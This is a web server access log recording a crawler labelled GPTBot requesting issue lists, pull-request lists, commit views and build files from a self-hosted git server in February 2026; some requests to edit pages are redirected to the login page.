"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_controller.cpp" [Client 74.7.227.38] [Length 27712] [Gzip 6.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold-transport.hpp" [Client 74.7.227.38] [Length 24757] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_controller.hpp" [Client 74.7.227.38] [Length 25597] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:18:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:18:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11907] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 11195] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" -[17/Feb/2026:18:24:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" -[17/Feb/2026:18:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/index.html" -[17/Feb/2026:18:24:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 